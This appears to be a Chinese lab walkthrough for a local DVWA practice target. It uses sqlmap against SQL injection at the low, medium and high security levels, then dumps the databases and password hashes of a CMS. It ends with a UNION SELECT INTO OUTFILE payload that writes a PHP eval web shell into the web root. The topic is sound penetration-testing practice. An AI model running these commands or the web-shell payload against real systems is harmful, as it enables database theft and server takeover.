实验环境要求: php
一、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB html
二、安装VMware® Workstation 14以上 web
整体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机做为攻击机。使用kali中的sqlmap攻击dvwa上的sql注入和sql盲注漏洞。 sql
任务1、使用kali中的sqlmap攻击dvwa中sql注入漏洞(low) shell
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 数据库
任务2、使用kali中的sqlmap攻击dvwa中sql注入漏洞(medium) centos
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 浏览器
观察能够看出为POST表单 cookie
使用Burp劫获POST信息 测试
将信息保存成文件
使用文件进行攻击
任务3、使用kali中的sqlmap攻击dvwa中sql注入漏洞(high)
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"
观察页面信息为POST表单
原始方法确定不行,因此再试试刚才的方法
保持请求
试事后发现失败
查看源码后使用二阶SQL注入—second-order
拓展任务1、使用kali中的sqlmap攻击cms中sql注入漏洞
sqlmap -u http://192.168.91.80/cms/show.php?id=1
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs
sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables
sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords
拓展任务2、经过sql注入漏洞获取sql-shell和os-shell
直接使用命令是错误的
咱们须要在靶机修改一些参数来实现
重启服务
1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #
执行不了说明没有权限,修改dvwa文件权限